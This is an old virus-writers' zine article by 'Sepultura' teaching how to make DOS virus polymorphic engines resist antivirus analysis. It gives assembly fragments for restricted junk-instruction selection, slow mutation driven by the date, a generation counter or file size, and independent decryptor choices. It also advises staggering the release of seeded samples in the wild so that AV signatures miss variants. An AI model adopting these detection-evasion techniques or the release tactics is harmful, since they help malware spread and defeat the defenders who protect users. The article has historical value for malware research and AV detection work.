                     POST - DISCOVERY - STRATEGIES
                     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                              By Sepultura

                   -USE-ANARCHY-TO-GET-WHAT-YOU-WANT-

                              Introduction
                              ~~~~~~~~~~~~

        Most virii these days take many Pre-Discovery precautions.  This
simply means that they take precautions to avoid discovery, assuming the
virus has not already been discovered.  Common examples of Pre-Discovery
Strategies are File Stealth, Sector Stealth, and MCB Stealth (i.e. any
stealth).  These mechanisms are used to stop the virus being discovered,
but once it has been discovered, and is in the hands of the AV, they're
essentially useless. It is only a matter of days (or even hours) until a
suitable scan string or algorithm has been determined for inclusion in
their AV programs.

        There is, however, a solution: POST DISCOVERY STRATEGIES.  These
are mechanisms that, instead of serving the purpose of hiding the virus
from detection, make the virus harder to analyse, and hence make it
harder to determine a scan string or detection algorithm.  To be
entirely honest, the previous statement is not completely correct - in
order to take advantage of any of these methods your virus cannot have a
scan string - without at least polymorphism, Post Discovery Strategies
ARE USELESS.  This document will be
divided into three main sections:       Polymorphism
                                        Anti-Bait Techniques
                                        Anti-Debugger Techniques.

        I have decided to do it in that particular order,  as it follows
my master scheme,  which in my  opinion takes maximum advantage of  Post
Discovery Strategies, and which I will outline throughout this document.

        I have supplied example code fragments throughout this document,
several full programs in the Anti - Debugger section,  as well as a bait
maker in the Anti-Bait section, so you can test your Anti-Bait routines.


                              Polymorphism
                              ~~~~~~~~~~~~

                   -I-USED-THE-ENEMY-I-USED-ANARCHY-

        This section  is not  intended to  tell you  what a  polymorphic
engine is,  nor  will it tell you  how to code one.  If  you do not know
either of these, you should read this when you do,  or alternatively you
could read this,  and take the explained methods into account  when  you
do code one.

        The thing  you have  to remember  is that  the AV people need to
devise an algorithm that will detect near to 100% of their samples,  but
at the same time have only a small number of false positives.  Your job
is, of course, to stop them from doing this.


                         Polymorphism: The Obvious
                         ~~~~~~~~~~~~~~~~~~~~~~~~~
        One of the most obvious things that would help you in your Post
Discovery Strategies is to make the decryptors and junk as varied as
possible. This way, they cannot use an algorithm that traces through the
code and concludes that the file is not infected as soon as an opcode
is encountered that can't be generated by your engine. What might not
seem so obvious is that although your engine should be able to CREATE a
wide variety of junk instructions, it should not USE a wide variety of
junk instructions in each decryptor.  This might seem strange, but it
can be very useful in delaying the AV's efforts.  This is because there
are two methods that the AV will use to analyse your engine:

       1. They will disassemble the virus and analyse the engine, to see
       what it can generate in all possible cases.

       2. They will infect tens of thousands of bait files to see what
       it generates in all possible cases.


        The first of these can be countered by keeping the actual engine
encrypted,  independently of the virus,  and then  keeping the decryptor
protected  -  using the  methods outlined in  Section 3 (Anti - Debugger
Techniques).

        The  second  method can be  countered using the  techniques that
will be discussed in this section (Polymorphism), and Section 2  (Anti -
Bait Techniques).

        By  using only a very small variety of the large number of  junk
instructions  that your engine can generate,  when the AV people look at
the sample bait files,  they will only see a small selection of the junk
that your virus can really create. Because your polymorphic engine is so
heavily encrypted / armoured, they will not have time to disassemble it,
and will have to make their judgements based on the bait files. However,
since the decryptors will only have  a limited selection of all possible
cases,  they could easily make the mistake of basing their algorithm  on
just those decryptors,  and release an incomplete algorithm.  Of  course
they will not realise their mistake until it is too late. Let us look at
the following code as an example:

------------------------------------------------------------------------
;Please note that this is simply a code fragment.  junk? are supposed to
;be sub-procedures that create different junk opcodes, while get_rand is
;supposed  to  be  a sub-procedure  that returns a  random number  in AX
;between 0 and AX. It is assumed that ES = DS = CS.

choose_junk_routines:
        mov     cx,5                    ;This code should be run only once,
        mov     ax,0Ah                  ;when the virus installs it self TSR.
        call    get_rand                ;It will select 5 out of 15 junk
        add     ax,ax                   ;routines to call for the decryptors.
        xchg    si,ax                   ;Because it is only run once, all
        add     si,offset main_junk_tbl ;decryptors will only use those junk
        mov     di,offset junk_tbl      ;routines 'til the system is rebooted
        rep     movsw                   ;and the virus re-installed.

        ...

main_junk_tbl:                          ;This is a table, listing all
        dw      offset junk0            ;possible junk routines.
        dw      offset junk1
        dw      offset junk2
        dw      offset junk3
        dw      offset junk4
        dw      offset junk5
        dw      offset junk6
        dw      offset junk7
        dw      offset junk8
        dw      offset junk9
        dw      offset junkA
        dw      offset junkB
        dw      offset junkC
        dw      offset junkD
        dw      offset junkE

junk_tbl:                               ;This is a table, to store the 5 junk
        dw      0,0,0,0,0               ;routines to actually be used.

        ...

put_junk:
        mov     ax,4                    ;This routine when, called will
        call    get_rand                ;generate 1 junk instruction.
        add     ax,ax                   ;It will call 1 of the 5 routines
        xchg    si,ax                   ;stored in junk_tbl.
        lodsw
        call    ax
        ret
------------------------------------------------------------------------

        The above code fragment,  will ensure that all files infected in
any 1 session, will only use 5 out of the 15 possible junk instructions.


                       Polymorphism: Slow Mutation
                       ~~~~~~~~~~~~~~~~~~~~~~~~~~~
        The above techniques work well,  but can be even more  effective
when used in conjunction  with slow mutation.  Slow  Mutation  basically
means that instead of making certain decisions  based on random numbers,
you  make the  decisions  based on  relatively static values.  The  most
common values used for this, are from the date (i.e. the month or day of
the  month).  For  example,  let  us imagine  that  the  sub - procedure
'choose_junk_routines' in the previous example, was replaced with this:

------------------------------------------------------------------------
choose_junk_routines:
        mov     ah,2a                   ;ah=2a/i21 (get system date)
        int     21
        mov     dl,0
        xchg    dh,dl
        xchg    dx,ax
        cwd                             ;ax=month, dx=0
        mov     cx,6
        div     cx                      ;divide month by 6
        xchg    dx,ax                   ;ax = remainder (i.e. 0 - 5)
        add     ax,ax
        xchg    si,ax
        add     si,offset main_junk_tbl
        mov     di,offset junk_tbl
        mov     cx,5
        rep     movsw
------------------------------------------------------------------------

        The advantage of using this method is that the same set of five
junk routines will be used for an ENTIRE MONTH.  With the previous
example, if the AV were to make some bait files, look at them, conclude
that your virus only generated five different junk instructions, and
then run the bait maker again after resetting the system, he/she would
get bait files with (probably) a different set of junk instructions in
the decryptor.  Because of this, he/she would probably catch on.  This
is important to note, because they will have to make a set of bait files
to devise the algorithm, and then at least another set to test it.  If
you based the 5 instructions on the month, and armoured the
choose_junk_routines procedure, then they would get the same 5
instructions, because they would all be produced in the same month, and
would not easily catch on.  Other things you should base upon slow
mutation techniques include what registers to use, the looping method,
the encrypt/decrypt method, and the length of the decryptor.  This way,
they have to reboot the computer each time, and set a new date, to see
all possible combinations.  Considering there are thousands of bait
files to be made, this also means that there are thousands of resets to
be done!

        Another thing you could base slow mutation decisions on,  is   a
generation counter.  This is very effective,  because if the AV runs  an
infected file,  and then because the virus is  TSR  in memory,  runs the
bait creator, to create some infected samples, all the infected samples,
will be of the same generation.  Even if the AV people think of changing
the date, the fact that the virus changes some aspects of itself on each
generation, will not be so obvious. This is especially true if the virus
makes the changes on,  say every fourth generation,  instead of each and
every generation. For example:

------------------------------------------------------------------------

        inc     cs:word ptr generation  ;This should be run once,
                                        ;at installation.

        ...

;This sub-procedure will choose what method to use to decrement the
;count register. It will choose one of the 8 possible procedures to
;call from the "decrement_tbl" table. Instead of choosing a method at
;random, it divides the generation by 8, and then takes the result
;modulo 8 (i.e. (GENERATION / 8) mod 8) to choose which procedure to
;use. In short, the
;decrement method will only change every 8th generation. The AV do not
;spend enough time to see all possible methods, as they would have to
;look at 64 different generations. They will most likely look at only
;one or two.

choose_decrement_method:
        mov     ax,0
generation      equ     $-2             ;Generation counter starts at 0

        shr     ax,3                    ;Divide Generation count by 8
        and     ax,7                    ;get number between 0 and 7
        add     ax,ax
        xchg    si,ax
        add     si,offset decrement_tbl
        lodsw
        call    ax
        ret

        ...

decrement_tbl:                          ;this is supposed to be a table of
        dw      offset code_dec_reg     ;all the possible procedures you can
        dw      offset code_sub_reg_1   ;use to decrement the count register.
        dw      offset code_add_reg_negative_1
        dw      offset code_clc_sbb_reg_1
        dw      offset code_stc_sbb_reg_0
        dw      offset code_clc_adc_reg_negative_1
        dw      offset code_stc_adc_reg_negative_2
        dw      offset code_inc_dec_dec_reg
------------------------------------------------------------------------

        Of course,  you do not have to base  something as trivial as the
method of decrement on the  generation counter,  and could  instead base
something more important like the actual method of decryption on it.

        Also,  if you wanted to be really sly  (and I know you do),  you
could use the above method, but then release the virus in the wild, with
its generation counter set to something like 16.  This way,  no one will
see the first 2 methods,  until the generation counter has carried over.
About a week after releasing it, you could release it somewhere else, so
that the AV people will get the first specimen, and their algorithm will
be missing the first two methods, while the second infection you release
can have the counter  set to 0,  so that the decryptors  using the first
two methods will be in the wild,  and will spread, before the AV realise
their mistake.

        Another thing you could base your slow poly on,  is the file you
are infecting.  For example,  let us imagine you based the above example
on the SIZE of the file to be infected, divided by 1000, rather than the
GENERATION divided by 8.  Since the bait files  will be of  the same  or
similar size, little to no change will be seen. If a different file of a
different size was infected however,  you would have a totally different
decryptor!


                Polymorphism: Make No Two Conditions Dependent
                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        One of the biggest mistakes you could make when coding an engine
is making two conditions dependent on the same thing.  For example, let
us imagine that you made both the index register used and the decryption
method used dependent on the month.  This could possibly mean that when
XOR encryption is used, you can guarantee BX is the index register, and
when ADD is used, SI will be the index register.  This way, all they
have to do is check for a XOR [BX],?? instruction or an ADD [SI],??.  If
you made this mistake, and had four index registers and four decryption
methods, the scanner need only check for four possible instructions.
However, if these were decided on totally independent criteria, they
would have to check for 16 different instructions, increasing the chance
of false positives. For another example, let us look at the following:
------------------------------------------------------------------------

code_jmp:       mov     ax,3f           ;this code will generate a random
                call    get_rand        ;conditional jump, to a random offset
                mov     ah,al           ;between 0 and 3f bytes from the
                or      al,70           ;jump. Note that the conditional
                stosw                   ;jumps are 70h -> 7fh.
------------------------------------------------------------------------

        The above example will always generate a working conditional
jump.  It does, however, have a fairly obvious flaw.  If the jump opcode
is 70h then the offset of the jump will be 0, 10h, 20h, or 30h.  If the
jump opcode is 71h then the offset of the jump will be 1, 11h, 21h, or
31h.  This pattern holds for all of 70h to 7fh.  This is very dangerous,
as a scanner could use something like this in its algorithm:
------------------------------------------------------------------------

;This code fragment, is assumed to be part of a scanner that is tracing
;through the code it scans. It is assumed that DS:SI points to the current
;instruction being processed.

                lodsw
                cmp     al,70
                jb      not_cond_jmp
                cmp     al,7f           ;checks if we are dealing with a
                ja      not_cond_jmp    ;conditional jump.

                and     ax,0f0f         ;If the jump was generated with the
                cmp     al,ah           ;above example, AL will always = AH.
                jne     file_not_infected

not_cond_jmp:   <DO THE NEXT CHECK>
------------------------------------------------------------------------

        As you can see,  if many things are dependent on each other,  an
algorithm could be used that uses techniques like the above,  and if all
rules are followed, safely assume the file was infected.  To  avoid  the
above check, the conditional jump coder should be something like this:
------------------------------------------------------------------------

                mov     ax,3f
                call    get_rand
                mov     bl,al
                mov     al,0f
                call    get_rand
                or      al,70
                mov     ah,bl
                stosw
------------------------------------------------------------------------

        As you can see, in the above example, the  offset of the jump is
totally independent of the jump's opcode.  This will make the detection
algorithm a lot harder to devise.